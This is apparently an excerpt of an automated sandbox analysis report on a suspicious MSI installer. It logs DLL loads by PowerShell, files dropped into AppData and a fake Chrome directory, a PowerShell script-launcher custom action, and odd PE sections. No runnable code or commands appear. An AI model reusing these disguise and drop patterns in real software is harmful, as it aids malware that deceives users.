Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: msvcp140_app.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: vcruntime140_1_app.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: vcruntime140_app.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: vcruntime140_1_app.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: magnification.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: wtsapi32.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1A66AEDC-93C3-4ACC-BA96-08F5716429F7}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Br_i421i2-2481-125_754864.msi

Static file information: File size 9782272 > 1048576

Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\vcomp140_app.amd64.pdb source: vcomp140_app.dll.1.dr
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\initialexe\chrome.exe.pdb source: WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000009.00000000.2061595070.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: Br_i421i2-2481-125_754864.msi, MSI3E49.tmp.1.dr, 4b3b29.rbs.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdbg source: Br_i421i2-2481-125_754864.msi, MSI3E49.tmp.1.dr, 4b3b29.rbs.1.dr
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\msvcp140_app.amd64.pdb source: WebExperienceHostApp.exe, 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_pwa_launcher.exe.pdb source: WebExperienceHostApp.exe, 00000008.00000003.2029891072.00007DF4924A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WebExperienceHostApp.pdb&& source: WebExperienceHostApp.exe, 00000008.00000000.2006121013.00007FF61949A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe.1.dr
Source:	Binary string: WebExperienceHostApp.pdb source: WebExperienceHostApp.exe, 00000008.00000000.2006121013.00007FF61949A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe.1.dr
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\vcruntime140_app.amd64.pdb source: WebExperienceHostApp.exe, 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: mrt100_app.pdb source: mrt100_app.dll.1.dr
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\vcomp140_app.amd64.pdbGCTL source: vcomp140_app.dll.1.dr
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\vulkan-1.dll.pdb source: WebExperienceHostApp.exe, 00000008.00000003.2050593930.00007DF4924C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: B.pdb source: external_extensions_0000x.57.8.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Br_i421i2-2481-125_754864.msi, 4b3b27.msi.1.dr

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Code function: 8_2_00007FF619492AA0 LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,

8_2_00007FF619492AA0

Source: initial sample

Static PE information: section where entry point is pointing to: .nFA

Source: mrt100_app.dll.1.dr	Static PE information: section name: .didat
Source: vcruntime140_1_app.dll.1.dr	Static PE information: section name: .didata
Source: vcruntime140_app.dll.1.dr	Static PE information: section name: _RDATA
Source: xmpp.dll.1.dr	Static PE information: section name: .didata
Source: chrome.exe.8.dr	Static PE information: section name: .gxfg
Source: chrome.exe.8.dr	Static PE information: section name: .retplne
Source: chrome.exe.8.dr	Static PE information: section name: CPADinfo
Source: chrome.exe.8.dr	Static PE information: section name: _RDATA
Source: chrome.exe.8.dr	Static PE information: section name: malloc_h
Source: chrome_elf.dll.8.dr	Static PE information: section name: .didata
Source: chrome_elf.dll.8.dr	Static PE information: section name: .dim
Source: chrome_elf.dll.8.dr	Static PE information: section name: ..yy
Source: chrome_elf.dll.8.dr	Static PE information: section name: .g1t
Source: chrome_elf.dll.8.dr	Static PE information: section name: .nFA
Source: chrome_pwa_launcher.exe.8.dr	Static PE information: section name: .00cfg
Source: chrome_pwa_launcher.exe.8.dr	Static PE information: section name: .gxfg
Source: chrome_pwa_launcher.exe.8.dr	Static PE information: section name: .retplne
Source: chrome_pwa_launcher.exe.8.dr	Static PE information: section name: LZMADEC
Source: chrome_pwa_launcher.exe.8.dr	Static PE information: section name: _RDATA
Source: chrome_pwa_launcher.exe.8.dr	Static PE information: section name: malloc_h
Source: vulkan-1.dll.8.dr	Static PE information: section name: .gxfg
Source: vulkan-1.dll.8.dr	Static PE information: section name: .retplne
Source: vulkan-1.dll.8.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007DD180 pushfq ; retf 0000h		8_2_00007FFE007DD181
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007DF6C4 pushfq ; ret		8_2_00007FFE007DF6C5

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\appData\vcruntime140_1_app.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\appData\xmpp.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3D2C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI435B.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\appData\mrt100_app.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\appData\msvcp140_app.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\appData\vcomp140_app.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\vulkan-1.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\appData\vcruntime140_app.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3CCD.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\appData\vcamp140_app.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3DBC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3D6C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3D4C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\appData\vccorlib140_app.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_elf.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\vulkan-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_elf.dll	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3D2C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI435B.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3CCD.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3DBC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3D6C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3D4C.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
